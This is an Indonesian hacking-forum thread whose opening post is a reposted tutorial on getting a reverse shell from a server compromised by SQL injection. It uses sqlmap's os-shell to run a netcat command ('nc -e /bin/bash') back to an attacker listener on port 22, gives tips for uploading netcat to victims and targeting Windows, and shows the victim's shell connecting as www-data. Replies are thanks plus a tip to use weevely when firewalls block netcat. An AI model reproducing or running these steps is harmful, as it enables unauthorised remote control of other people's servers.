Back Connect With SQLMap
#1
malam semua..

ane yg tukan baru bau kencu alias ingusan ini mau ngeshare tut yg ane temuin di forum tetangga "hacker-pengguna baru.org"

ini semua bukan hasil dari tutorial ane, melainkan tutor dari Red Dragon sodara kita juga pengguna Backtrack.

ane posting disini karna ane ingin berbagi apa yang ane temuin buat kita belajar bersama.

langsung saja

Terinspirasi dari Spawn Shell With SQLmap, saya menemukan cara yang sedikit nyentrik. Yaitu melakukan back connect dengan shell yang tercipta pada SQL Injection yang dilakukan SQLmap.

Back Connect

Victim -> Port Listener -> Attacker

Back Connect memungkinkan attacker untuk mendapatkan shell korban. Ini seperti kasus bertelefon.

A -> Nomer Telepon -> B

Jika B adalah attacker, maka A akan berusaha menghubungi B dengan nomer telepon milik B. Perbedaannya dengan Back Connect, adalah back connect membutuhkan port tertentu untuk melakukan listening terhadap koneksi yang masuk. Contoh. Dalam sebuah kasus, Attacker mengeksploitasi korban dan memerintahkan korbah:

"Kau harus menghubungiku di IP address xxx.xxx.xxx.xxx pada port xxx"

Perintah ini akan dilakukan oleh korban yang terkena eksploitasi. Dalam hal ini, attacker telah menyediakan port masuk kepada korban. Pengaturan port sendiri tidak bisa sembarangan. Port yang digunakan untuk listening, tidak boleh port yang telah digunakan oleh service lain, seperti port 445 milik samba, port 21 milik ftp, port 22 milik ssh, atau port 80 milik apache. Gunakanlah port yang belum terpakai. Maka listener akan berjalan. Ketika proses listening telah berjalan, maka korban akan datang pada IP address yang telah ditentukan attacker, dan masuk lewat port yang disediakan attacker. Apa tidak berbahaya jika ada yang masuk ke dalam port kita? Tidak. Attacker telah mengatur prosedur sedemikian rupa, sehingga ketika terjadi hubungan, maka akan ada yang diekseksi. Contoh:

Victim [cmd.exe or /bin/bash] -> Port Listener -> Attacker

Ketika korban berhasil masuk ke port listener milik attacker, maka cmd.exe atau /bin/bash akan dieksekusi oleh korban sehingga attacker dapat mengatur command prompt [Windows] milik korban, atau mengatur bash [UNIX] milik korban.
Pada tutorial kali ini, saya masih menggunakan Virtual OS pada localhost untuk menghindari dampak buruk dari tutorial ini.


Preparation
1. SQLmap (dapat ditemukan pada backtrack)
2. Netcat (dapat ditemukan pada backtrack)

Walkthorugh :

1. Memerintahkan korban untuk melakukan back connect

Ketahuilah, korban setidaknya harus memiliki netcat. Jika tidak, maka anda harus mengupload netcat pada korban. Anda bisa menggunakan netcat yang sudah dicompile, dan siap pakai, jadi anda tidak perlu melakukan installasi netcat yang membutuhkan privilege root. Netcat bisa anda download di dimari aja
Setidaknya anda harus dapat mengeksekusi sebuah perintah ke dalam mesin korban. Pada tutorial kali ini, saya akan menggunakan shell yang tercipta dari SQLmap.[/quote]
"Anda sudah mendapatkan shell, mengapa harus melakukan back connect?"


Pertanyaan bagus, shell milik sqlmap tidaklah interactive, sehingga memiliki sejumlah keterbatasan dalam perintah-perintah yang interactive, seperti mengubah password, dan lain sebagainya.

Untuk mengeksekusi perintah netcat, anda hanya perlu memasukan perintah berikut.
Quote:os-shell> whereis nc
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz'[/code]os-shell> /bin/nc.traditional 10.10.1.1 22 -e /bin/bash


Kebetulan virtual OS yang saya gunakan kali ini, sudah terpasang netcat, sehingga saya tidak perlu lagi mengupload netcat ke server.

Keterangan :
10.10.1.1 adalah IP address saya (attacker), sesuaikan dengan IP address anda, dan pastikan anda memiliki IP public, sehingga dapat dihubungi oleh korban.
22 adalah port listener yang saya gunakan, kebetulan saya tidak menjalankan service ssh. Jika service ssh berjalan, maka saya tidak dapat melakukan listening pada port ini.
-e /bin/bash adalah perintah yang tereksekusi ketika koneksi terjadi. Anda harus mengubah -e /bin/bash menjadi -e cmd.exe jika korban anda menggunakan operasi system windows.


2. Lakukan listening pada port yang anda tentukan

Sebelum perintah di atas dieksekusi, anda harus melakukan listening pada port yang telah anda tentukan sebelumnya. Hal ini bertujuan agar korban dapat menghubungi attacker dengan baik (berhasil). Jika port listening belum terbuka, dan perintah telah tereksekusi, maka akan terjadi kegagalan koneksi. Ini seperti melakukan sesi ftp pada server yang tidak menjalankan service ftp.

Untuk melakukan listening, anda hanya perlu memasukan perintah:
Code:
<< back|track 5 R2 [~] nc -lvp 22

Kemudian tekan enter, sehingga anda mendapatkan output seperti di bawah ini.[code]<< back|track 5 R2 [~] nc -lvp 22
listening on [any] 22 ...

Keterangan :
-l adalah opsi listening, attacker akan melakukan listening pada setiap koneksi yang masuk. Hal ini seperti stand by untuk dihubungi oleh korban.
-v adalah opsi verbose, opsi ini tidaklah begitu penting. Anda bisa meniadakan opsi ini ketika mengeksekusi perintah netcat.
-p adalah opsi port. Anda diharuskan menetapkan port listening. Anda tidak bisa membiarkan nilai -p kosong. Port bisa diatur pada rentang 1-65535, dengan syarat port tersebut tidak digunakan oleh service lain.


3. Game Over.

Ekseksusi kedua perintah pada tahap satu dan dua.[Image: 4.jpg]



















Code:
<< back|track 5 R2 [~] nc -lvp 22
listening on [any] 22 ...
10.10.1.128: inverse host lookup failed: Unknown host
connect to [10.10.1.1] from (UNKNOWN) [10.10.1.128] 47195
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[Image: 5.jpg]



selamat mencoba ya

disini ane hanya menshare tanpa ada mengubah sedikit pun dari sumber yg ane dapat.. sekali lagi ane hanya bertujuan untuk berbagi kepada teman2 semua agar kita sama sama belajar

Sumber : hacker-pengguna baru.org ( RED DRAGON )

#2
ijin nyimak kak

#3
thank kak tutorialnya
Every one Have Superiority that you don't know..

#4
mantep om ^_^..ijin nyicip,,tapi kok double threadnya Tongue,,ada dua,,kebanyakan nekan post thread ya hihihi

#5
wew mantap penjelasan'a om

#6
kadang pake NC tertutup ama firewall nya pak . Big Grin


jadi teralihakan ke weevely nya . . di tool backtracknya ^_^ .

ini lebih simpel dan enak menurut saya . . bagaimana menerut pendapatnya teman2 ^_^
pengguna baru Imoet

#7
all :
di sawer donk ijo ijo nya all

Big Grin

@junio... wkwkwkw jangan kan nekan "post".. make quote aja ane sering kelupaan omz

wkwkkwkwkwkkw

#8
tutornya ajib kakaSmile
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#9
makasih udah shre om Tongue

#10
thx udh share, +1 dari ane om Smile






Users browsing this thread: 1 Guest(s)